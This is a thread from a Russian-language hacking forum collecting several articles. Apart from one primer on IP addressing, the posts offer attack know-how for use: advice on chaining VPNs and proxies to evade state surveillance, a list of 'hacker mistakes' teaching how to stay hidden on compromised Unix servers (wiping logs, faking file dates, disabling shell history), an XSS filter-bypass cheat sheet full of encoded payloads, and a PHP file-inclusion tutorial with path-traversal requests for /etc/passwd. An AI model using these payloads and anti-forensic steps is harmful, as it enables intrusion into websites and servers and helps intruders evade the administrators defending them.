Объявление

Свернуть
Пока нет объявлений.

Разные статьи.

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • #91
    Частное
    Таким образом, можно сделать вывод о том, что MI5, MI6 и их коллеги с других континентов действительно хорошо себя чувствуют в Сети. В нынешнем августе, по некоторой информации, британцы ответили на лондонские теракты таинственным "принудительным закрытием" некоторых наиболее радикальных исламистских интернет-ресурсов (а сейчас, по отдельным сведениям, идет активная борьба с распространением недавно начатого интернет-вещания "Аль-Каеды").

    Как именно британцам удалось этого добиться, точно, конечно же, неизвестно, но британская газета The Sunday Times, обнародовавшая эту информацию, ссылается на... спецслужбы Израиля. Израильские разведчики, одни из лучших в мире, вообще много чего знают и умеют.

    ...И тоже сталкиваются с вопросами необходимости освещения своей деятельности в Интернете, сбора через него сведений от информаторов и, конечно, рекрутинговой работы. Еще в марте этого года внутренняя израильская разведслужба ШАБАК ("Служба общей безопасности"), ранее также в цифровом пространстве себе не проявлявшая, запустила онлайновое представительство по легко угадываемому адресу שירות הביטחון הכללי. Пока на нем размещена информация только на иврите и основная ее часть касается именно кадровой политики.

    Внешняя израильская разведка "Моссад", в свою очередь, примерно с начала 2004 года в сдержанной форме оповещает мир о своих достижениях по адресу www.mossad.gov.il. В принципе, существование этого сайта можно обосновать нормами "хорошего сетевого поведения", заданными главными спецслужбами США - ЦРУ, ФБР и другими, которые поддерживают свои подробные и хорошо проработанные интернет-ресурсы с "начала времен". Надо ли говорить, что любые сайты любых спецслужб являются излюбленными объектами регулярных хакерских шалостей.

    Близкое
    И здесь необходимо отметить, что нормы сетевого поведения разведслужб адекватно воспринимаются и российской Федеральной службой безопасности, которая открыла свой сайт еще в конце 1999 года (без всяких предписаний относительно информационной открытости госорганов) по адресу Информация ФСБ России :: Федеральная Служба Безопасности. Среди информационных разделов, рассказывающих о деятельности ведомства, некоторые посетители тогда сразу отметили для себя раздел "Телефон доверия", где, в частности, говорится: "Российские граждане, сотрудничающие с иностранными разведками, могут связаться с ФСБ России по телефону доверия с тем, чтобы стать агентами-двойниками. В этом случае денежное вознаграждение, получаемое такими агентами от иностранных спецслужб, будет полностью сохранено, и с ними будут работать сотрудники ФСБ РФ высочайшего класса. При этом будет гарантирована анонимность и конфиденциальность". Далее следует выдержка из примечания к статье 275 УК РФ ("государственная измена"), где говорится, что добровольное и своевременное оповещение о собственной шпионской деятельности может быть основанием для освобождения от уголовной ответственности.

    Еще раньше ФСБ, наследница одной из наиболее могущественных спецслужб мира - КГБ СССР, - начала работу над собственным локальным аналогом Carnivore - системой СОРМ-2 ("система оперативно-розыскных мероприятий"), которая, по некоторым данным, была в последующие месяцы успешно внедрена на мощностях российских интернет-провайдеров. Кстати, с 1 января 2006 года вступает в силу утвержденная недавно правительством РФ новая недакция правил взаимодействия операторов связи с уполномоченными государственными органами, осуществляющими оперативно-розыскную деятельность.

    Примерно с 2001 года существует сайт Службы внешней разведки России (СВР) ������ ������� �������� ���������� ���������, который также довольно обстоятельно рассказывает о деятельности этого ведомства в области охраны государственной безопасности.

    Как известно, Интернет как таковой вырос из американского военного проекта, и довольно легко можно себе представить, что информационный потенциал глобальной сети был вовремя оценен и Пентагоном, и американскими спецслужбами, следствием чего могли стать механизмы "контроля" за Интернетом, заложенные в самую его первооснову. Недаром США сейчас наотрез отказываются отдавать контроль над базовыми структурами Сети (корневыми DNS-серверами) Организации объединенных наций, которая подняла этот вопрос в преддверии Всемирного саммита по информационному сообществу (WSIS), который будет проходить в ноябре в Тунисе.

    Сергей Рублёв

    ВЫВОДЫ:


    Так что уважаемые господа хацкеры все соксы и прокси очень легко отследить коннекты даже если логов не ведется.
    Отсюда делаем выводы:
    1) Всегда используем VPN для обхода СОРМ в Ru.
    2) Берем Socks 5 нейтральных стран,таких как Турция,Испания и т.д.
    3) Не забываем что протокол VoIP не поддерживает соксы(стало быть впн юзаем)
    4) Идеальная цепочка VPN - Win Dedic - VPN(or socks) - Socks с поддержкой DES криптовки.
    При таком раскладке вычеслить будет невозможно с вероятностью 99,9%
    Но не стоит делать завышеную самооценку себе т.к пробивать могут и не по этим признакам(допустим по нику если сделан дефейс) и т.д.

    Комментарий


    • #92
      Десять роковых ошибок хакера

      Молодой хакер, на счету которого было огромное количество взломанных машин, безуспешно пытался зайти на сервер международного банка. Эту систему он наконец-то взломал, потратив на нее несколько бессонных ночей. "Неужели засекли? Я же чистил логи и был предельно осторожен", - вертелось у него в голове. Внезапно его раздумья прервал тонкий писк UPS, что означало отключение электропитания. Затем раздался громкий стук в дверь, за которой стояли вооруженные работники федеральной службы. Эта история закончилась бы печально, если бы горе-хакер не... проснулся от писка своего будильника.

      На самом деле, мало кто из хакеров станет взламывать банковские системы, не зная азов собственной безопасности. Админы на стратегически важных системах - люди неглупые и получают за свою работу хорошие деньги, поэтому соревноваться с ними в знаниях компьютерных технологий очень опасно.

      Но ведь ломают! Ломают и удерживаются незамеченными на серверах месяцами, а то и годами. И все благодаря элементарной маскировке. Достигается она, как правило, соблюдением нескольких неписаных законов, которые знает каждый уважающий себя хакер. Нарушив одно из таких правил, можно стать уязвимым для админов, которые своевременно обнаружат и нейтрализуют найденного взломщика. При этом последствия для нарушителя могут быть весьма плачевными.

      Тебе интересно, о каких нарушениях идет речь? В этом материале я кратко изложу десять ошибок хакера, которые, на мой взгляд, являются самыми популярными. Ошибки актуальны в основном для unix-like систем, поэтому любителей Windows попрошу не питать особых надежд.

      1. Чистка логов
      Как ни странно, мало кто любит чистить логи во взломанной системе. А ведь именно по логам админ обнаруживает вторжение. Давай рассмотрим механизм создания логов в unix-like операционке.

      Как правило, служебная информация скидывается в файл при помощи функции syslog(). Эта функция напрямую работает с демоном syslogd, либо с его альтернативой (syslog-ng, например). У этого демона есть свой конфигурационный файл (по умолчанию /etc/syslog.conf), в котором подробно указывается местонахождение log-файлов и критерии для того или иного лога, чтобы корректно отделить мух от котлет. Хакер часто забывает, что админ может сменить названия дефолтовых журналов, перенаправив /var/log/secure, к примеру, в /usr/admin/secure. К тому же логи могут писаться в консоль конкретному юзеру, что сильно затрудняет положение хакера.

      Чистка таких файлов должна осуществляться с особой осторожностью: проверенными логвайперами, либо руками (идеальный вариант). Я лично встречал такие логвайперы, после применения которых журналирование данных останавливалось. Думаю, добропорядочный админ при таком раскладе быстро заметит неполадки в системе.

      2. Изменение даты на файлах
      Дата на файлах - уязвимое место хакера. Именно по дате программы-следилки за системой определяют установку руткита, либо изменение системных файлов. Сменить дату на файле позволяет команда touch с параметром -t, после которого идет дата в формате: МесяцДеньЧасМинутаГод. Взломщики очень часто забывают менять дату обратно на старую после правки конфа либо перезаписи бинарника. Админские утилиты быстро определяют изменения в системе и посылают подробный отчет администратору на мыло.

      3. История команд
      Незаменимый атрибут любого шелла - хранение истории команд, набранных пользователем. Это сделано, чтобы иметь возможность повтора набранной когда-то команды. Файл с историей команд в первую очередь изучается хакером при удачном взломе системы, чтобы получить первоначальную информацию о деятельности админа, либо вытянуть пароли из консольных программ.

      Но если посмотреть с другой стороны, то и админ может быть параноиком, регулярно изучающим свой собственный history-файл. И если хакер порядочно наследил в системе, оставив таким образом историю установки руткитов или DoS'еров, реакция администратора непредсказуема. Поэтому каждый взломщик должен своевременно заметать свои следы.

      Местонахождение history-файла можно узнать через переменную среды HISTFILE, просмотрев ее консольной командой echo $HISTFILE. Соответственно после команды export HISTFILE=/dev/null запись команд в файл прекратится. Внимание! Данный прием работает только на время текущей сессии, поэтому хакеру придется выполнять команду каждый раз при появлении в системе.

      4. Заражение системы руткитами
      Как это ни парадоксально, но установка руткитов может запросто выдать хакера. Во-первых, заменяя системные файлы, он, как правило, совершает ошибку №2, так как устанавливать первоначальную дату на туеву хучу бинарников мягко говоря долго и неспортивно. Во-вторых, если админ установил новую версию пакета (binutils, например), то установка старой поверх системной ни к чему хорошему не приведет. Более того, нарушителя могут выдать ключи к командам, задаваемые alias'ом. К примеру, старая версия /bin/ls не понимает ключа --colors, а многие руткиты содержат именно старые версии. Иными словами, установив старый руткит на новую систему, хакер автоматически подписывает себе смертный приговор.

      5. Установка своего софта
      Взломав систему, нарушитель нередко ставит на нее свой софт, к примеру, socks или nmap, что вполне логично - ему была необходима подопытная система, и он ее получил. Но даже если процессы взломщика скрываются, то в этом случае админ может обнаружить открытый 1080-ый порт в системе. Тогда он быстро догадается, в чем дело, и тем самым раскроет маскировку хакера.

      На самом деле, после взлома нарушитель анализирует деятельность админа и делает выводы о степени запущенности сервера. Но устанавливать свои программы в корневые директории все же не стоит. Чтобы этого избежать, хакер должен создать свой отдельный скрытый каталог и ставить весь боевой софт в него. Это достигается командой ./configure --prefix=/path/to/hidden/xakep_dir при установке пакетов.

      6. Сканирование со взломанной системы
      Самая распространенная ошибка среди всех перечисленных. Ведь скан с порутанного сервера никогда не приводит ни к чему хорошему. Смотри сам: взломщик сканирует подсеть nmap'ом или другим доступным сканером. После чего законопослушный админ просканенной сетки может написать жалобу в abuse компании, с которой производился скан, с высылкой всех логов, доказывающих факт вторжения. Служба безопасности, закрепленная за компанией, в свою очередь приходит к выводу, что их сервер поломали, и стучат по голове администратору. Ясно, что после этого инцидента хакеру на сервере не жить.

      Конечно, эта ситуация далеко не типична. Из-за инертности наших доблестных админов сканирование часто сходит хакеру с рук. Но имей в виду, что он может нажить себе лишние проблемы, ведя активную деятельность со взломанного сервера.

      7. Изменение рулесов фаервола
      Фаервол - личное дело админа. И если он его установил, подразумевается, что он знает все его правила как свои пять пальцев. Если же взломщик будет их настраивать на свой вкус, то рано или поздно админ пресечет эти деяния. Исключение могут составлять жуткие нагромождения правил, составленные явно не администратором системы. Добавление неприметной записи в эту гремучую смесь не вызовет катастрофы.

      Если же фаервол содержит несколько удобочитаемых правил, и, судя по HISTFILE, администратор регулярно следит за ними, то ничего не остается, кроме как подчиниться им, либо изменить исходники фаервола (для C гуру). Это, кстати, самый классный вариант.

      8. Добавление новых пользователей
      Довольно типичная ситуация: взломав систему, хакер делится впечатлениями о взломе в IRC или ICQ. Его лучшие друзья тут же начинают выпрашивать шелл для личных нужд. Поразмыслив немного, взломщик добавляет пользователя в систему, успокаивая себя, мол, шелл-то не рутовый, чем он может мне помешать. На следующий день администратор получает утренний отчет об аномальных происшествиях в системе и находит в нем интересную строку, например:

      New users:
      xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash

      Теперь можно попрощаться с root-аккаунтом на взломанной тачке.

      Чтобы такого не происходило, в системе не должно быть новых пользователей со стороны взломщика. Лучше всего проверить на прочность уже существующие учетные записи и пользоваться ими.

      9. Допуск в систему посторонних лиц
      Эта ошибка похожа на предыдущую, но есть одно отличие. Нередко у хакера просят доступ к серверу через его же собственные бэкдоры. После предоставления такого доступа можно сразу попрощаться с сервером. Все люди разные, и постороннее лицо может легко нарушить все вышеописанные правила за один сеанс работы, тем самым нарушив твою маскировку в системе.

      Грамотный хакер никогда не создает подобных ситуаций. Более того, он не треплется о взломе где попало, всегда ставя собственную безопасность на первое место. Нарушение данного правила возможно лишь в случае, если ты убежден, что после предоставления доступа у тебя не возникнет лишних проблем.

      10. Выбор профессии хакера
      Да, ты не ослышался! Хакер - как сапер, первый раз ошибается еще при выборе своей профессии. Каждый взлом может оказаться для него фатальным, и сам он это осознает. Но не может с этим смириться, считая взлом экстремальным видом спорта. Если ты все еще раздумываешь, "быть или не быть хакером", то я дам тебе совет. НЕТ! Быть хакером уже не так модно, да к тому же опасно. Так что займись лучше чем-нибудь другим, например, продажей школьных выпускных сочинений по русскому языку через интернет .

      Вот, собственно, и все оплошности, приводящие к печальным последствиям. Но, еще раз повторюсь, все эти ошибки актуальны лишь в системе, за штурвалом которой сидит добросовестный админ, заслуженно получающий свою зарплату. В запущенных серверах, где админ мониторит систему по пьяни и только по праздникам, можно творить что угодно - хуже все равно не будет.

      Этот материал призван показать типичные случаи, когда хакеры выдают себя во взломанной системе. Не следует считать это руководством к действию. Прежде чем совершить непоправимое, прочитай еще раз 10 пункт. В мире ведь еще столько интересного
      (с)Mak7v be Grabba

      Комментарий


      • #93
        Полный рассказ про IP

        IP-адрес (aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети и (или) интернету.

        IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса).

        IP-адреса представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов.

        IP-адрес состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/8). Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Согласно [1] существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у IANA, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющимся крупными провайдерами.

        Номер узла в протоколе IP назначается независимо от локального адреса узла. Маршрутизатор по определению входит сразу в несколько сетей. Поэтому каждый порт маршрутизатора имеет собственный IP-адрес. Конечный узел также может входить в несколько IP-сетей. В этом случае компьютер должен иметь несколько IP-адресов, по числу сетевых связей. Таким образом, IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.

        Бесклассовая адресация

        Со второй половины 90-х годов XX века классовая адресация повсеместно вытеснена бесклассовой адресацией, при которой количество адресов в сети определяется только и исключительно маской подсети.

        CIDR-адреса vs. INET-адреса
        Иногда встречается запись IP-адресов вида 10.96.0.0/11. Данный вид записи заменяет собой указание диапазона IP-адресов. Число после косой черты означает количество единичных разрядов в маске подсети. Для приведённого примера маска подсети будет иметь двоичный вид 11111111 11100000 00000000 00000000 или то же самое в десятичном виде: 255.224.0.0. 11 разрядов IP-адреса отводятся под номер сети, а остальные 32 − 11 = 21 разрядов полного адреса — под локальный адрес в этой сети. Итого, 10.96.0.0/11 означает диапазон адресов от 10.96.0.0 до 10.127.255.255
        Значение маски
        1 2 3 4
        1 128 0 0 0
        2 192 0 0 0
        3 224 0 0 0
        4 240 0 0 0
        5 248 0 0 0
        6 252 0 0 0
        7 254 0 0 0
        8 255 0 0 0
        9 255 128 0 0

        32 255 255 255 255

        Запись IP-адресов с указанием через слэш маски подсети переменной длины также называют CIDR-адресом в противоположность обычной записи без указания маски, в операционных системах типа UNIX также именуемой INET-адресом.

        Особые IP-адреса

        В протоколе IP существует несколько соглашений об особой интерпретации IP-адресов:
        * eсли весь IP-адрес состоит только из двоичных нулей, то он обозначает адрес того узла, который сгенерировал этот пакет; этот режим используется только в некоторых сообщениях ICMP;
        * eсли в поле номера сети стоят только нули, то по умолчанию считается, что узел назначения принадлежит той же самой сети, что и узел, который отправил пакет;
        * eсли все двоичные разряды IP-адреса равны 1, то пакет с таким адресом назначения должен рассылаться всем узлам, находящимся в той же сети, что и источник этого пакета. Такая рассылка называется ограниченным широковещательным сообщением (limited broadcast);
        * eсли в поле номера узла назначения стоят только единицы, то пакет, имеющий такой адрес, рассылается всем узлам сети с заданным номером сети. Например, в сети 192.190.21.0 с маской 255.255.255.0 пакет с адресом 192.190.21.255 доставляется всем узлам этой сети. Такая рассылка называется широковещательным сообщением (broadcast).

        Динамические IP-адреса

        IP-адрес называют динамическим, если он назначается автоматически при подключении устройства к сети и используется в течение ограниченного промежутка времени, как правило, до завершения сеанса подключения.

        Для получения IP-адреса клиент может использовать один из следующих протоколов:

        * DHCP (RFC 2131) — наиболее распространённый протокол настройки сетевых параметров.
        * BOOTP (RFC 951) — простой протокол настройки сетевого адреса, обычно используется для бездисковых станций.
        * IPCP (RFC 1332) в рамках протокола PPP (RFC 1661).
        * Zeroconf (RFC 3927) — протокол настройки сетевого адреса, определения имени, поиск служб.

        Интересно

        * В ОС Windows свой IP-адрес можно узнать, набрав ipconfig в командной строке.
        * В ОС Unix свой IP-адрес можно узнать, набрав ifconfig в командной строке.
        * IP-адрес, соответствующий доменному имени, можно узнать с помошью команды: ping hostname.tld или nslookup hostname.tld

        (с)ICQ_BRUTER in grabberz

        Комментарий


        • #94
          [XSS] Приёмы обхода фильтров

          [XSS] Приёмы обхода фильтров.
          [Инпут]
          Здрасте. Данное писание посвящено обзору некоторых из способов обхода xss-фильтров. Уровень сложности материала ориентирован, в среднем, на пользователя имеющего понятие об XSS-атаках, но в то же время имеються доступные краткие объяснения для менее искушенного в этом плане читателя. Это моя первая статья, которая в силу моей неопытности в писательском деле, может иметь некоторые изъяны, так что держите свои помидорные пулеметы в боевой готовности.
          Так же хотелось бы напомнить, что сами XSS атаки имеют намного больший потенциал нежели кража cookies. С помощью XSS можно выполнять теже действия, что и администратор сайта, главное знать как правильно реализовать атаку. Но перед тем, как что-то делать, нужно убедиться в надежности, а в данном случае, в надежности xss-векторов перед системами фильтрации. Краткое содержание данного писания:

          [1] - Спасение кавычек.
          [2] - Использование атрибута.
          [3] - Добавление угловой скобки.
          [4] - Использование тега </TITLE>.
          [5] - Шифрование Base64.
          [6] - Использование Flash.
          [7] - Кодировка UTF-7.
          [8] - Мультимедиа контейнеры.
          [9] - Озэръ.

          [1]-[Спасение кавычек]
          Часто встречается ситуация когда фильтр экранирует либо удаляет двойную (") и одинарную (') кавычки. В такой ситуации следует воспользоваться String.fromCharCode(), или unescape(), которые переводят все символы в цифровой код. Разница между ними, лишь, в использовании систем исчисления: String.fromCharCode() использует DEC-значения символов, а unescape() использует HEX-значения.

          Пример:
          Код:
          alert(String.fromCharCode(120,97,107,110,101,116,46,114,117))
          , где цифры это десятичные коды(DEC) символов.
          Пример:

          Код:
          alert(unescape(/%78%61%6b%6e%65%74%2e%72%75/.source))
          , где "/%78%61%6b%6e%65%74%2e%72%75/" - это шеснадцатиричные коды (HEX) символов.

          Ещё одним методом, является использование, в качестве альтернативы кавычкам, конструкции / /.source, но можно и без использования .source

          Пример:
          Код:
          <SCRIPT>alert(/message/.source)</SCRIPT>
          Пример:
          Код:
          <SCRIPT>alert(/message/)</SCRIPT>
          [2]-[Использование атрибута]
          Некоторые из атрибутов различных тегов имеют интересные свойства, благодаря которым вы можете использовать кодирование содержимого XSS-вектора. Кодировки, которые можно использовать, такие как, HTML Entities DEC Encode(имеет вид: &#XXX; ), Long HTML Entities DEC Encode(имеет вид: &#(0000)XXX), HTML Entities HEX(имеет вид: &#xXX),(X-цифра). LongHTMLEntities отличается от HTML Entities тем, что не использует точку с запятой для разделения значений символов, и использует дополнительные четыре цифры слева, что даёт возможность обойти фильтрацию &#XXX;-подобных значений, т.к. будет задействовано 7 цифр вместо 3-х.

          Пример (javascript:alert('xaknet.ru')) в HTML Entities DEC:
          Знак "!" перед применением удалить

          Код:
          <IMG SRC=&!#106;&!#97;&!#118;&!#97;&!#115;&!#99;&!#114;&!#105;&!#112;&!#116;&!#58;&!#97;&!#108;&!#101;&!# 114;&!#116;&!#40;&!#39;&!#120;&!#97;&!#107;&!#110;&!#101;&!#116;&!#46;&!#114;&!#117;&!#39;&!#41;>
          Пример (javascript:alert('xaknet.ru')) в Long HTML Entities DEC:
          Знак "!" перед применением удалить

          Код:
          <IMG SRC=&!#0000106a&!#0000118&!#0000097&!#0000115&!#0000099&!#0000114&!#0000105&!#0000112&!#0000116&!#00 00058&!#0000097&!#0000108&!#0000101&!#0000114&!#0000116&!#0000040&!#0000039&!#0000120&!#000097&!#000 0107&!#0000110&!#0000101&!#0000116&!#0000046&!#0000114&!#0000117&!#0000039&!#0000041>
          Пример (javascript:alert('xaknet.ru')) в HTML Entities HEX:
          Знак "!" перед применением удалить

          Код:
          <IMG SRC=&!#x6A;&!#x61;&!#x76;&!#x61;&!#x73;&!#x63;&!#x72;&!#x69;&!#x70;&!#x74;&!#x3A;&!#x61;&!#x6C;&!#x6 5;&!#x72;&!#x74;&!#x28;&!#x27;&!#x78;&!#x61;&!#x6B;&!#x6E;&!#x65;&!#x74;&!#x2E;&!#x72;&!#x75;&!#x27; &!#x29;>
          Использование атрибутов имеет такую особенность, благодаря которой можно использовать табуляцию, которая будет разделять вектор на части, и это даст вам ещё одну возможность обойти фильтрацию по названиям функций и методов JavaScript. Схожим методом является изменение регистра букв, но существенным недостатком данного способа является отсутствие возможности изменять регистр букв в названии метода.

          Пример:

          Код:
          <IMG SRC="Ja va sc ri pt : al er t( 'me ssa ge' )">
          - такая конструкция работает.
          Пример:
          Код:
          <IMG SRC="JaVaScRiPt:aLeRt('message')">
          - такая конструкция работать не будет из-за aLeRt(), вызвавшего ошибку.

          Так же можно комбинированно использовать эти два способа, но главное соблюдать целостности HEX и DEC значений закодированных символов, т.е. их не стоит разрывать табуляцией, т.к. конструкция не будет работать.

          Пример HTML Entities DEC:
          Знак "!" перед применением удалить
          Код:
          <IMG SRC=""Ja &!#118; as c &!#114; i pt :a &!#108; ert &!#40; 'm e s s a g e' &!#41 ;">
          Всех атрибутов в которых реализована такая возможность я не нашел, да и не искал, т.к. временами случаются приступы вселенской лени, но как мне кажется, это атрибуты, которые имеют характер указателя на объект, либо атрибуты тегов указывающих на объект (страница, рисунок, аплет, и т.д.).

          [3]-[Добавление угловой скобки]
          Данный способ позволяет обойти фильтр, проверяющий сразу на присутствие соответствия открывающих и закрывающих угловых скобок, после обнаружения, которых, считает все, что в них находиться тегом и вырезает, либо видоизменяет до состояния неработоспособности. Избежать вмешательства фильтра можно путём добавления перед открывающим тегом второй открывающей угловой скобки. Особенность данного способа является обязательное наличие знака комментария //, который ставиться перед закрывающим тегом, дабы сделать вид прокомментированной посторонней закрывающей скобки, что бы не нарушить синтаксис и не вызвать ошибку.

          Пример:

          Код:
          <<SCRIPT>alert('message')//<</SCRIPT>
          Пример:

          Код:
          <<IMG SRC=javascript:alert('message')//>
          [4]-[Использование тега </TITLE>]
          Так как тег <TITLE>, в большинстве случаев, находится в начале кода страницы, вы, путём добавления закрывающего </TITLE> можете добиться вырезания всего кода страницы между открывающим и закрывающим тегами TITLE, что может добавить шансы на срабатывание скрипта, который должен выполниться сразу после </TITLE>, если использовать данную конструкцию:


          Код:
          </TITLE><SCRIPT>alert("message");</SCRIPT>
          - закрывает все, что находиться между <TITLE> страницы и векторным (вводимым вами) </TITLE>, после чего выполняет alert().

          [5]-[Шифрование алгоритмом base64]
          Также является хорошим способом, если фильтрация направлена на список названий тегов или JS-кода.

          Пример:
          Код:
          <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4=">
          PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4= - это зашифрованный вектор <script>alert(xaknet.ru)</script>.

          [6]-[Использование Flash.]
          В качестве обфускации вектора, можно использовать ActionScript через Flash, путём использования переменных и присваивания им значений, которые являются частями xss-кода.

          Пример:

          Код:
          a="get";
          b="URL(\"";
          c="javascript:";
          d="alert('message');\")";
          eval(a+b+c+d);
          [7]-[Использование UTF-7]
          Заключается данный способ в изменении кодировки символов xss-вектора на UTF-7. Это может сработать в тех случаях, когда в странице не указывается кодировка, и атакующий может заставить страницу испольвоть UTF-7, тем самым, обойти фильтрацию, изменив некоторые из символов UTF-8 на UTF-7.

          Пример:
          Код:
          <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('message');+ADw-/SCRIPT+AD4-
          В примере угловые кавычки представлены в кодировке UTF-7.

          [8]-[Мультимедиа контейнеры]
          Данный способ направлен на использование мультимедийных файлов (видео, картинки) в качестве "контейнеров" для xss-векторов. Осуществить данную атаку можно, создав текстовый файл, в который поместится вектор, и конвертировать этот файл в необходимый нам формат видео/изобр., после чего залить на сервер и обратиться к нему через браузер. Главной особенностью является обязательное использование тега <script></script>, т.к. другие теги не распознаються IE, при открытии видео и изображений. Существенным недостатком является и то, что эта ататка легко обнаруживается фильтрами по заголовкам мультимедиа файлов. Для обхода таких фильтраций, воспользуйтесь изображением в формате PNG, открыв её через текстовый редактор, и дописав в конец свой скрипт. Важной особенностью при этом является соблюдение небольшого размера файла. Способ с видео форматами, к сожалению, не нашел.

          Пример проведения атаки через видео-файл(mov) by ErrNick - http://video.xaknet.ru/index.php?video&view=79

          [9]-[Озэръ]
          Тут я привёл некоторые из альтернативных вариантов проведения xss-атак:

          "><img src="x:x" onerror="alert(0)"> - вызывается ошибка в атрибуте SRC=, из-за чего срабатывает alert(). x:x - это разные числа.
          with(document)alert(cookie) - эквивалентен alert(document.cookie).
          prompt() - эквивалентен alert().

          Внимание: некоторые из представленных способов работоспособны не во всех браузерах.

          [Оутпут]
          Как видно, это не все возможные способы обхода фильтрации, но основные их обличия я попытался описать. Мне хотелось бы увидеть только здравую и адекватную критику с вашей стороны...

          Зэ энд, товарищи! Спасибо за этеншен.

          Большое cпасибо ErrNick'у за то, что прочел и дал свою оценку данному материалу, тем самым избавив меня от переживаний о качестве данного писания.

          Источники информации использованой при написании:

          -Крупицы знаний и доводов из моего мозга.
          -The Cheat Sheet – Robert "RSnake" Hansen. Так же, в низу странички находятся кодировщики кода.
          -Our Favorite XSS Filters/IDS and how to Attack Them - BlackHat 2009
          -x3k.ru - онлайн-сервис, включающий в себя программы для кодирования/декодирования.

          Комментарий


          • #95
            МЕГА МАНУАЛ ПО ХЕКУ САЙТОВ by Krist_ALL

            Что тут такое:
            Данный мануал написан дабы покончить с тупыми вопросами по всему инету аля "подставил кавычку,вылезла ошибка, что делать дальше?". Мануал охватывает очень широкий спектр тем о взломе. Но прежде чем мы преступим, нужно создать подготовиться, обзавестись нужные инструментами и базовыми знаниями. И глупо думать, что прочитав этот манул, ты станешь крутым хакером. Это не так. Личный опыт - вот чего нет во всех мануалах. Сухая теория. Опыт бесценное знание. Постараюсь не писать су*** теорию, а чтобы максимально все было приближенно к реальным случаям. Описанные здесь темы раскрыты если не на 100 процентов, то на 99 точно) И хватит уже подставлять кавычки и дальше не знать что делать! Вперед читать мануал. От тебя потребуется только знание основ php,sql,javascript,html,linux и логика. ВСЁ!


            Для лучшего усвоения материалы, тебе понадобиться установить у себя на компьютере веб сервер. Я не советовал бы денвер, есть прекрасная альтернатива ему- AppServer - AppServNetwork. А если ты хочешь все установить сам и не пользоваться сборками, то вот подробный мануал - Настройка PHP5 + Apache 2.2 + MySQL 5.1.41 + phpMyAdmin 3.2.3 - PHP для начинающих - CyberForum.ru Также хочу дать ссылку на замечательные уроки по пхп, лучше не встречал - [url=http://www.php.su/lessons/]PHP.SU -

            Комментарий


            • #96
              4. PHP(PERL) INJECTION
              __________________________________________________ ____

              Наверняка ты часто встречал url вида

              Код:
              http://..../index.php?file=news.php
              Разновидностей может быть масса (например ....file=news (без расширения)).
              Что можно сказать про такой url?
              Скрипту index.php передается имя файла в переменной file, который нужно подключить к index.php.

              Как это выглядит?

              Код:
              Список файлов на сервере:
              index.php - Основной скрипт
              news.php - Скрипт новостей
              contacts.php - Скрипт с контактами
              header.html - html файл заголовка страницы (Шапка и меню обычно)
              footer.php - html файл нижней части сайта (счетчики итд)
              Теперь посмотрим на файл index.php

              Код:
              <?php
              // Подключается файл header.html
              // PHP не будет пытаться интерпретировать html как php команды т.к. не встретит
              // <?php и ?> в header.php
              // А если php не находит php дескрипторов (<?php и ?>) то текст из подключаемого
              // файла просто выводиться в браузер.
              include('header.html'); // Выведет в браузер содержимое файла header.html
              ....
              // Подкючается файл, имя которого передано в GET переменной file
              // file=news.php -> include('news.php');
              // file=a.php -> include('a.php');
              include($_GET['file']);
              ...
              // Выводиться в браузер подвал сайта (счетчики итд)
              include('footer.html');
              ?>
              Вместо Include может быть require.

              Что можно из этого извлечь?
              Раз файл, имя которого в переменной file, подгружается в основной скрипт, то мы можем передать свое имя фала, и файл с этим именем подключиться в index.php
              Например подключим файл news.php
              Код:
              http://.............index.php?file=news.php

              Бывает 3 разных вида кода с инклудом:
              1. Имя файла с расширение берется из переменной.
              Код:
              // ...........?file=a.php
              include($_GET['file']);
              //Станет Include('a.php');

              2. Имя файла из переменной вставляется после имени папки.
              Код:
              include("pages/$_GET['file']");
              В таком слечаи чтобы подключить файл который находиться выше папки pages, просто добавляем ../. Пример:
              Код:
              http://...........index.php?file=../config.php
              Можно еще выше подняться и дотянуться до /etc/passwd нпример
              Код:
              http://...........index.php?file=../.../../etc/passwd
              Колличесвто ../ опцианально. Необязательно 10 или 15. ../ в пути означает поднятие на верх на один этаж. А мы не знаем как глубоко находятся файлы сайта, поэтому мы на всякий случай пишем с запасом.

              3. Значение из переменой вставляется ДО имени папки.
              Код:
              include("$_GET['razdel']/default/index.php");
              В этом случаи поможет только удаленный иклуд.
              Можно инклудить файлы , которые хранятся на хостинге ИЛИ с других сайтов.

              Что нам это дает:

              1. Можно прочитать файл /etc/passwd (В этом файле нет <?php и ?> поэтому он выведется в браузер)
              Запрос будет такой http://....../index.php?file=../../../. ... etc/passwd
              index.php
              Код:
              .......
              .......
              include('../../../../../../../../../../etc/passwd');
              Можно другие файлы читать, например логи веб сервера. Зачем? А в логи мы можем писать текст.
